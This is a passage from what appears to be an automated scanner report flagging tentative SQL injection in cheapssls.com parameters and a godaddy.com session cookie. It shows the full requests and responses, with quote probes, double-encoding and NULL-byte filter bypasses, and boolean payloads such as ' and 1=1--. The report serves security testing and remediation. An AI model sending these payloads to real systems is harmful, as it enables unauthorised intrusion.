ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome%2527%2527&ve%5Bos%5D=Windows&ve%5Bclient_language%5D=en-US&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y%5D=1200&ve%5Bcolor%5D
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:50:30 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:50:29 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.14. https://www.cheapssls.com/index.php [ve%5Bbrowser_version%5D parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.cheapssls.com
Path:   /index.php

Issue detail

The ve%5Bbrowser_version%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ve%5Bbrowser_version%5D parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218'&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows&ve%5Bclient_language%5D=en-US&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:53:18 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=g6klbngno3a2v876ve7g981qf7; expires=Sat, 17-Sep-2011 21:53:18 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=51f1b%250d%250af904b85b4d7; expires=Sun, 02-Sep-2012 21:53:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:53:17 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218''&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows&ve%5Bclient_language%5D=en-US&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:53:20 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:53:19 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.15. https://www.cheapssls.com/index.php [ve%5Bclient_language%5D parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.cheapssls.com
Path:   /index.php

Issue detail

The ve%5Bclient_language%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ve%5Bclient_language%5D parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows&ve%5Bclient_language%5D=en-US'&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y%5D=1200&ve%5Bcolor%5D=16&ve%5Btime_begin%5D=1315085544.8744

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:28 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=10es6k81pc1o6s61hl49jh1ft4; expires=Sat, 17-Sep-2011 21:55:28 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:55:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:28 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows&ve%5Bclient_language%5D=en-US''&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y%5D=1200&ve%5Bcolor%5D=16&ve%5Btime_begin%5D=1315085544.8744

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:30 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:29 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.16. https://www.cheapssls.com/index.php [ve%5Bos%5D parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.cheapssls.com
Path:   /index.php

Issue detail

The ve%5Bos%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ve%5Bos%5D parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ve%5Bos%5D request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows%2527&ve%5Bclient_language%5D=en-US&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y%5D=1200&ve%5Bcolor%5D=16&ve%5Btime_begin%
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:03 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=oeriroaec2ic68rk7n1cd2rg94; expires=Sat, 17-Sep-2011 21:55:03 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:55:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:02 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows%2527%2527&ve%5Bclient_language%5D=en-US&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y%5D=1200&ve%5Bcolor%5D=16&ve%5Btime_begin%
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:06 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:05 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.17. https://www.cheapssls.com/index.php [ve%5Burl%5D parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.cheapssls.com
Path:   /index.php

Issue detail

The ve%5Burl%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ve%5Burl%5D parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart%00'&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows&ve%5Bclient_la
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:20 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=5kmg5l9v8a0jd8f6a9e6qhrhf2; expires=Sat, 17-Sep-2011 21:49:20 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=51f1b%250d%250af904b85b4d7; expires=Sun, 02-Sep-2012 21:49:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:20 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart%00''&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows&ve%5Bclient_la
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:24 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:23 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.18. http://www.godaddy.com/gdshop/offers/cross_sell.asp [ASPSESSIONIDACSTCQTS cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.godaddy.com
Path:   /gdshop/offers/cross_sell.asp

Issue detail

The ASPSESSIONIDACSTCQTS cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ASPSESSIONIDACSTCQTS cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM'%20and%201%3d1--%20; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; expires=Sun, 02-Sep-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB109&sitename=www%2Egodaddy%2Ecom&cookies=1&split=14&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2Fssl%2Fssl%2Dcertificates%2Easpx%3Fci%3D8346&isc=&privatelabelid=1&page=%2Fgdshop%2Foffers%2Fcross%5Fsell%2Easp&referringdomain=&referringpath=19a7e39c%2Ddcff%2D40f6%2D8f6d%2De19d0c50259d&shopper=46215917&querystring=ci%3D42031%26config%3Dssldefault; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:49:51 GMT
Content-Length: 275694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Low cost domain names, domain transfers, web hosting, email accounts, and so much more.</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Pragma" content="no-cache">
<meta name="description" content="Register & transfer domains for less. Reliable hosting. Easy-to-use site builders. Affordable SSL certificates. eCommerce solutions. ICANN-accredited.">
<meta name="keywords" content="domain name, domain registration, registrar, renewal, transfer domain, cheap, inexpensive, domain, register, DNS, URL, web address, internet address, web site name, bulk domain registration, buy domain, private domain registration, bulk price, .com, .net, .org, Go Daddy.com, Go Daddy, godaddy.com, godaddy">
<link rel="shortcut icon" href="http://imagesak.securepaynet.net/assets/godaddy.ico">
<link rel="stylesheet" type="text/css" href="http://img2.wsimg.com/pc_css/1/gd_20110829_http.min.css" /><link rel="stylesheet
...[SNIP]...

Request 2

GET /gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault HTTP/1.1
